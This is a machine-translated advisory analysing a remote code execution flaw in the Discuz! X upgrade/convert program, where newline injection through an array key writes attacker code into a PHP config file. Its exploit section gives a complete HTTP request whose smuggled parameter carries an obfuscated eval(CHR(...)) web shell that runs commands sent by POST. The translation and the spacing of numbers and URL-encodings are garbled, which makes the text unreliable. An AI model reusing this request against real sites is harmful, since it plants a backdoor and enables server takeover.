Discuz! X upgrade/conversion program GETSHELL vulnerability analysis-vulnerability warning-the black bar safety net

2014-02-15T00:00:00
ID MYHACK58:62201442391
Type myhack58
Reporter 佚名
Modified 2014-02-15T00:00:00

Description

0x01 vulnerability analysis


Vulnerability root cause in the code comment appears in the wrap, resulting in code execution, the process is as follows:

0x0101 first, from the index. php the 3 row 0 with into.

! enter image description here

0x0102 do_config_inc. php 3, line 7, with the into this save_config_file()function.

! enter image description here

0x0103 gobal. func. php 6 2 4-line, talk into the getvars()function.

! enter image description here

0x0104 continue with the buildarray()function

! enter image description here

0x0105 vulnerability occurs in the 5-9 line 8, the$newline problem.

! enter image description here

Here because$key may be controlled, so$newline can be controlled, when the$newline appears to\r or\n, resulting in the BBB can be used as php code execution. As shown in Fig.

! enter image description here

0x02 exploit


You can construct the following request:

POST /DZ2/convert/ HTTP/1.1 Host: 192.168.52.129 Proxy-Connection: keep-alive Content-Length: 9 2 5 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Origin: null User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip,deflate,sdch Accept-Language: EN-us,EN;q=0.8

a=config&source=d7. 2_x2. 0&submit=yes&newconfig%5Btarget%5D%5Bdbhost%5D=localhost&newconfig%5Baaa%0D%0A%0D%0Aeval%28CHR%2 8 1 0 1% 2 9. CHR%2 8 1 1 8% 2 9. CHR%2 8 9 7% 2 9. CHR%2 8 1 0 8% 2 9. CHR%2 8 4 0% 2 9. CHR%2 8 3 4% 2 9. CHR%2 8 3 6% 2 9. CHR%2 8 9 5% 2 9. CHR%2 8 8 0% 2 9. CHR%2 8 7 9% 2 9. CHR%2 8 8 3% 2 9. CHR%2 8 8 4% 2 9. CHR%2 8 9 1% 2 9. CHR%2 8 9 9% 2 9. CHR%2 8 9 3% 2 9. CHR%2 8 5 9% 2 9. CHR%2 8 3 4% 2 9. CHR%2 8 4 1% 2 9. CHR%2 8 5 9% 2 9% 2 9%3B%2F%2F%5D=localhost&newconfig%5Bsource%5D%5Bdbuser%5D=root&newconfig%5Bsource%5D%5Bdbpw%5D=&newconfig%5Bsource%5D%5Bdbname%5D=discuz&newconfig%5Bsource%5D%5Btablepre%5D=cdb_&newconfig%5Bsource%5D%5Bdbcharset%5D=&newconfig%5Bsource%5D%5Bpconnect%5D=1&newconfig%5Btarget%5D%5Bdbhost%5D=localhost&newconfig%5Btarget%5D%5Bdbuser%5D=root&newconfig%5Btarget%5D%5Bdbpw% 5D=&newconfig%5Btarget%5D%5Bdbname%5D=discuzx&newconfig%5Btarget%5D%5Btablepre%5D=pre_&newconfig%5Btarget%5D%5Bdbcharset%5D=&newconfig%5Btarget%5D%5Bpconnect%5D=1&submit=%B1%A3%B4%E6%B7%FE%CE%F1%C6%F7%C9%E8%D6%C3

[1] [2] next